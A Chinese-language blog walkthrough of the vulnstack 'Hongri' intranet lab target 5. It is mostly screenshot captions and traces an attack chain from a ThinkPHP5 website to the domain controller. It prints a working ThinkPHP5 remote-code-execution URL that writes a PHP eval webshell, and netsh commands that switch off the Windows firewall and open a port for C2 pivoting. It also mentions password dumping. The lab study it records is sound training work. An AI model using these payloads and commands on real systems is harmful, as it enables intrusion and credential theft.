红日内网靶机五

靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ win7(双网卡): 192.168.1.18外网) 192.168.138.136(内网)

win2008:192.168.138.138

外网打点

image-20240107155302451

访问80看看,是TP5的站

image-20240107155311145

关于tp5的漏洞利用方式请查看:https://www.cnblogs.com/backlion/p/10106676.html

成功利用,并执行了命令

image-20240107155319436

写入shell

1
http://192.168.1.18/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["code"]);?^>>shell.php

image-20240107155327337

image-20240107155338352

上线C2

image-20240107155345635

内网渗透

image-20240107155353413

image-20240107155403691

内网存活主机探测

image-20240107155411626

查看域控

image-20240107155418963

image-20240107155428008

现在已经是管理员权限了可以直接抓下密码看看

image-20240107155436964

上链路进行横向

image-20240107155445862

image-20240107155454800

生成载荷上传到目标机器

image-20240107155505130

批量上线DC不成功

image-20240107155515875

**因为win7的防火墙缘故,5555端口是进不去的可以,关闭防火墙:**NetSh Advfirewall set allprofiles state off ,或者添加规则来放行5555端口

1
netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=5555

image-20240107155531308

最后全部上线

image-20240107155538623


红日内网靶机五
http://idea-oss.github.io/2022/06/15/红日内网靶机五/index/
作者
iDea
发布于
2022年6月15日
许可协议